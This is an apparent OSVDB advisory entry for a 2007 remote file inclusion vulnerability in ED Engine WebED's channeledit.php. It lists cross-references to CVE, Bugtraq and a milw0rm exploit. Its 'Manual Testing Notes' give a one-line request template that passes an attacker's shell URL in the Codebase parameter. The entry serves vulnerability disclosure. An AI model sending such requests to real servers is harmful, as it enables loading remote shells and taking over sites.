ED Engine WebED channeledit.php Codebase Variable Remote File Inclusion

2007-09-08T00:00:00
ID OSVDB:38395
Type osvdb
Reporter OSVDB
Modified 2007-09-08T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell]

References:

Related OSVDB ID: 38396 Related OSVDB ID: 38398 Related OSVDB ID: 38397 ISS X-Force ID: 36532 Generic Exploit URL: http://www.milw0rm.com/exploits/4384 FrSIRT Advisory: ADV-2007-3171 CVE-2007-4815 Bugtraq ID: 25608